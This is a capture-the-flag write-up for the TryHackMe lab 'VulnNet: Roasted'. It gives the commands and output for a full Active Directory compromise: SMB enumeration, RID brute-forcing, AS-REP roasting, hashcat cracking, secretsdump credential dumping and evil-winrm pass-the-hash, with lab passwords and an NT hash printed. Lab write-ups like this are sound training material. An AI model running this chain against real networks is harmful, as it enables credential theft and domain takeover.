VulnNet: Roasted

This is my write-up for the machine on TryHackMe known as VulnNet: Roasted:

I am going to start off my running the following nmap scan:

nmap -T4 -A -vvv -Pn -oN nmap.output

I then got the following result from the search:

# Nmap 7.91 scan initiated Sat Jul 24 15:18:10 2021 as: nmap -T4 -A -vvv -Pn -oN nmap.output
Increasing send delay for from 0 to 5 due to 25 out of 62 dropped probes since last increase.
Nmap scan report for
Host is up, received user-set (0.16s latency).
Scanned at 2021-07-24 15:18:11 EDT for 69s
Not shown: 995 closed ports
Reason: 995 conn-refused
135/tcp  filtered msrpc          no-response
139/tcp  filtered netbios-ssn    no-response
593/tcp  filtered http-rpc-epmap no-response
636/tcp  filtered ldapssl        no-response
3389/tcp filtered ms-wbt-server  no-response

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at .
# Nmap done at Sat Jul 24 15:19:20 2021 -- 1 IP address (1 host up) scanned in 70.18 seconds

My next step was to look at what each of the ports have on them using the browser. I was getting this message:

I looked at this write-up to compare the results for nmap, and changed my search to be the following:

nmap -T5 -sV -sC -T4 -Pn

I then got a different result:

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( ) at 2021-07-24 15:23 EDT
Nmap scan report for
Host is up (0.17s latency).
Not shown: 990 filtered ports
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-24 19:24:08Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: WIN-2BO8M1OE1M1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -11s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-24T19:24:27
|_  start_date: N/A

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 102.05 seconds

Running smbmap (an idea I got from the write-up mentioned previously) on the IP address got me the following result:

I then looked on to see what the author would do in this case. I ended up using this site to connect to the SMB share with the following command:

smbclient //

I then got this output:

I then downloaded those files using mget *:

I did see a couple names in the files, which could potentially be usernames we can exploit later:

I then downloaded the other files from the other share:

There were names that stood out on these files as well:

I then wanted to know where I would go from here. Viewing the site from before I realized that I would have to bruteforce SIDs. I used the Metasploit version (this takes 5-10 minutes):

msf6 > use auxiliary/scanner/smb/smb_lookupsid
msf6 auxiliary(scanner/smb/smb_lookupsid) > set rhosts
rhosts =>
msf6 auxiliary(scanner/smb/smb_lookupsid) > run

[*]     - PIPE(LSARPC) LOCAL(VULNNET-RST - 5-21-1589833671-435344116-4136949213) DOMAIN(VULNNET-RST - 5-21-1589833671-435344116-4136949213)
[*]     - USER=Administrator RID=500
[*]     - USER=Guest RID=501
[*]     - USER=krbtgt RID=502
[*]     - GROUP=Domain Admins RID=512
[*]     - GROUP=Domain Users RID=513
[*]     - GROUP=Domain Guests RID=514
[*]     - GROUP=Domain Computers RID=515
[*]     - GROUP=Domain Controllers RID=516
[*]     - TYPE=4 NAME=Cert Publishers rid=517
[*]     - GROUP=Schema Admins RID=518
[*]     - GROUP=Enterprise Admins RID=519
[*]     - GROUP=Group Policy Creator Owners RID=520
[*]     - GROUP=Read-only Domain Controllers RID=521
[*]     - GROUP=Cloneable Domain Controllers RID=522
[*]     - GROUP=Protected Users RID=525
[*]     - GROUP=Key Admins RID=526
[*]     - GROUP=Enterprise Key Admins RID=527
[*]     - TYPE=4 NAME=RAS and IAS Servers rid=553
[*]     - TYPE=4 NAME=Allowed RODC Password Replication Group rid=571
[*]     - TYPE=4 NAME=Denied RODC Password Replication Group rid=572
[*]     - USER=WIN-2BO8M1OE1M1$ RID=1000
[*]     - TYPE=4 NAME=DnsAdmins rid=1101
[*]     - GROUP=DnsUpdateProxy RID=1102
[*]     - USER=enterprise-core-vn RID=1104
[*]     - USER=a-whitehat RID=1105
[*]     - USER=t-skid RID=1109
[*]     - USER=j-goldenhand RID=1110
[*]     - USER=j-leet RID=1111

I then copied that into a file, and then ran grep on it to just print the list of the users only:

For some reason, the Impacket download on my Kali Linux machine was lacking a lot of scripts. I then cloned the following repository: I noticed a couple write-ups referring to, and so I decided to give that a try as well. I ran the following command to try to get hashes from the Users:

python3 ../resources/impacket/examples/ -dc-ip  -usersfile user.txt vulnnet-rst.local/ 

In the previous command, the vulnnet-rst.local was the IP address of the machine. I had just changed that in /etc/hosts. I got the following result:

Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User WIN-2BO8M1OE1M1$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User enterprise-core-vn doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set

I then realized that I would have to crack the hash in the output. My assumption is that this is a kerberos hash. Looking on, I found out that this is Kerberos 5, and the mode for this is 18200. I then tried to crack this using hashcat:

hashcat -m 18200 hash ../resources/rockyou.txt --force

The hash was then cracked:

I then plugged that information into smbmap:

└─$ smbmap -H -u t-skid -p 'tj072889*'
[+] IP: Name:                                       
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share 
        VulnNet-Business-Anonymous                              READ ONLY       VulnNet Business Sharing
        VulnNet-Enterprise-Anonymous                            READ ONLY       VulnNet Enterprise Sharing

I noticed that there were more READ ONLY shares available from this user. I then wanted to see what those files were:

Viewing the .vbs file it showed me a username and password:

I then did smbmap using this username and password:

I first used smbclient to get into the C$ drive. After not finding anything for a while, I looked at this write-up. I then realized that I had to use Impacket again in order to get the other hashes for the other users. I first ran crackmapexec:

└─$ crackmapexec smb -u a-whitehat -p bNdKVkjv3RR9ht                 
SMB     445    WIN-2BO8M1OE1M1  [*] Windows 10.0 Build 17763 x64 (name:WIN-2BO8M1OE1M1) (domain:vulnnet-rst.local) (signing:True) (SMBv1:False)
SMB     445    WIN-2BO8M1OE1M1  [+] vulnnet-rst.local\a-whitehat:bNdKVkjv3RR9ht (Pwn3d!)

I then added the "pwned" share into the command:

└─$ python3 ../resources/impacket/examples/ vulnnet-rst.local/a-whitehat:bNdKVkjv3RR9ht@
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] NL$KM 
 0000   F3 F6 6B 8D 1E 2A F4 8E  85 F6 7A 46 D1 25 A0 D3   ..k..*....zF.%..
 0010   EA F4 90 7D 2D CB A5 8C  88 C5 68 4C 1E D3 67 3B   ...}-.....hL..g;
 0020   DB 31 D9 91 C9 BB 6A 57  EA 18 2C 90 D3 06 F8 31   .1....jW..,....1
 0030   7C 8C 31 96 5E 53 5B 85  60 B4 D5 6B 47 61 85 4A   |.1.^S[.`..kGa.J
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Using the same write-up I learned about evil-winrm. I then used that to try to get a foothold into the machine:

evil-winrm -i -u administrator -H c2597747aa5e43022a3a3049a3c3b09d

I then got into the machine! When I looked into the C:\Users\Administrator\Desktop I found the system.txt file. I then realized, that I had to look for the user.txt file next. I found the user.txt file in C:\Users\enterprise-core-vn\Desktop. I then had both flags:

Last updated